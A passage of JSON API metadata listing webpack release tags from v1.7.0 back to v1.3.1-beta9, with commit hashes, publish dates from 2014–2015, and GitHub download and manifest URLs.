ck%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.